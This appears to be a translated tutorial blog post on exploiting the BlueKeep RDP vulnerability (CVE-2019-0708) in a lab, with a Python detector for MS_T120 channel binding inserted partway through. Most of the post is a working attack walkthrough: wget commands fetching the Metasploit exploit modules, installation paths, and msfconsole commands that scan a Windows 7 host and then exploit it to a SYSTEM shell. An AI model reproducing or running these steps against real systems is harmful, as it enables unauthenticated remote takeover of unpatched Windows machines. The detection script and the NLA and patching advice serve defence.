First, the vulnerability description
On May 15, 2019, Microsoft released a security patch for CVE-2019-0708, a remote code execution vulnerability in Windows Remote Desktop Services (RDP). It can be triggered remotely without any authentication, so its potential impact is enormous.
As of September 7, exploit (EXP) code has been publicly released as a pull request to metasploit-framework; it has been tested and can achieve remote code execution.
Second, affected versions
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
Put another way: apart from Windows 8 and Windows 10, almost every version has this vulnerability.
Third, starting the attack
Still our usual cast:
Kali machine: 192.138.198.134
Win7: 192.168.198.138
Preparation:
win7
1. Turn off the Windows 7 firewall
2. Open port 3389 (Remote Desktop Connection)
3. Sit back and wait to get owned
kali:
1. Update your msf (if your Kali version is 2019.4 or later, you can skip this step)
apt-get install metasploit-framework --> update metasploit
2. Download the exploit for this vulnerability
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
3. Add or replace the downloaded files in the corresponding directories
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb --> replace
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb --> replace
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb --> replace
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb --> add
Getting started
Launch msfconsole and search for the 0708 signature:
msfconsole --> start msf
search 0708 --> search for all files or modules related to 0708
Look at entry No. 0:
auxiliary/scanner/rdp/cve_2019_0708_bluekeep --> the module that detects this vulnerability
Let's use it and see which parameters it needs for detection:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep --> use this module
show options --> view the required parameters
Here we find that of all the parameters marked "yes" (required), only RHOSTS (the host address) is empty, so we set it to the target machine's address:
set RHOSTS 192.168.198.138 --> set RHOSTS to 192.168.198.138
exploit --> start the attack
After a few seconds we get the result; look at the fifth line from the bottom:
"The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel."
I'm too lazy to translate it; go Baidu it yourself. In any case, it means this host is likely affected by this vulnerability.
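The scanner message above hinges on the MS_T120 channel: a normal RDP client never asks for it, so a client Connect Initial that lists MS_T120 among its static virtual channels is a reliable sign of a BlueKeep probe or exploit attempt, and network IDS rules key on exactly that. The following Python script is an added example, not code from the original post or from Metasploit: it parses the TS_UD_CS_NET block of a client Connect Initial (layout per MS-RDPBCGR 2.2.1.3.4) and flags any connection that declares that channel. The PDU framing bytes and the source addresses are constructed placeholders, and the function names are mine.

```python
import struct

# TS_UD_CS_NET block type in the client Connect Initial user data (MS-RDPBCGR 2.2.1.3.4).
CS_NET_TYPE = 0xC003
CS_NET_HEADER_LEN = 8            # 2-byte type + 2-byte length + 4-byte channelCount
CHANNEL_DEF_LEN = 12             # 8-byte name (null padded) + 4-byte options
SUSPICIOUS_CHANNEL = "MS_T120"   # internal channel a legitimate client never requests


def build_cs_net(channel_names):
    """Build a TS_UD_CS_NET block. Constructed test data, not captured traffic."""
    defs = b"".join(
        name.encode("ascii").ljust(8, b"\x00")[:8] + struct.pack("<I", 0)
        for name in channel_names
    )
    body = struct.pack("<I", len(channel_names)) + defs
    return struct.pack("<HH", CS_NET_TYPE, 4 + len(body)) + body


def parse_client_channels(pdu):
    """Return the static virtual channel names declared in a client Connect Initial PDU.

    The block is located by its little-endian type marker and accepted only if the
    declared length exactly covers channelCount CHANNEL_DEF entries, which rules out
    accidental matches of the two marker bytes elsewhere in the PDU.
    """
    marker = struct.pack("<H", CS_NET_TYPE)
    offset = 0
    while True:
        idx = pdu.find(marker, offset)
        if idx < 0 or idx + CS_NET_HEADER_LEN > len(pdu):
            return []
        length, count = struct.unpack_from("<HI", pdu, idx + 2)
        if length == CS_NET_HEADER_LEN + CHANNEL_DEF_LEN * count and idx + length <= len(pdu):
            names = []
            for i in range(count):
                start = idx + CS_NET_HEADER_LEN + i * CHANNEL_DEF_LEN
                raw = pdu[start:start + 8]
                names.append(raw.split(b"\x00", 1)[0].decode("ascii", errors="replace"))
            return names
        offset = idx + 1


def check_connect_initial(pdu):
    """Flag a Connect Initial that binds MS_T120 (compared case-insensitively, to be safe)."""
    channels = parse_client_channels(pdu)
    flagged = [c for c in channels if c.upper() == SUSPICIOUS_CHANNEL]
    return {"channels": channels, "suspicious": flagged, "alert": bool(flagged)}


def triage(connections):
    """Run the check over (source_ip, pdu) pairs and return the sources worth alerting on."""
    return [src for src, pdu in connections if check_connect_initial(pdu)["alert"]]


# Constructed placeholder framing (TPKT + X.224 data + MCS Connect Initial tag, lengths left
# as zero). A real PDU also carries CS_CORE, CS_SECURITY and other blocks before CS_NET;
# the parser above does not depend on them, so they are omitted here.
PLACEHOLDER_FRAMING = b"\x03\x00\x00\x00\x02\xf0\x80\x7f\x65"
BENIGN_PDU = PLACEHOLDER_FRAMING + build_cs_net(["rdpdr", "rdpsnd", "cliprdr", "drdynvc"])
SUSPICIOUS_PDU = PLACEHOLDER_FRAMING + build_cs_net(["rdpdr", "cliprdr", "MS_T120"])

SAMPLE_CONNECTIONS = [
    ("192.0.2.10", BENIGN_PDU),      # constructed: ordinary desktop-client channel set
    ("192.0.2.77", SUSPICIOUS_PDU),  # constructed: scanner-style channel set
]

if __name__ == "__main__":
    for src, pdu in SAMPLE_CONNECTIONS:
        result = check_connect_initial(pdu)
        verdict = "ALERT" if result["alert"] else "ok"
        print(f"{src}: {verdict} channels={result['channels']}")
```

One caveat for anyone wiring this into a sensor: the Connect Initial is only visible in cleartext when the server accepts standard RDP security. With Network Level Authentication enforced, the exchange runs inside TLS and an unauthenticated client never reaches the channel-binding stage, which is exactly why enabling NLA (together with the patch) is the recommended mitigation for the versions listed in the second section.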
Since the vulnerability is there, let's start the attack.
Look at entry No. 1 of the 3 results:
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce --> use the exploit module
show options --> view the required parameters
set RHOSTS 192.168.198.138 --> set RHOSTS to 192.168.198.138
set target 2 --> set the victim machine's architecture (selectable values 0-7)
Unlike before, here you also need to set the architecture parameter; don't forget it, folks.
Once the parameters are set, you can start the attack:
exploit --> start the attack
When "Command shell session 1 opened" appears, it proves the attack succeeded; at this point you only need to press Enter.
Let's take a look at the result:
run whoami, which returns SYSTEM privileges
run ipconfig, which returns 192.168.198.138
OK, successfully owned.
Gee, our poor Win7.
As I always say:
if there is anything you don't understand, feel free to message me privately;
if I haven't explained something clearly, please comment.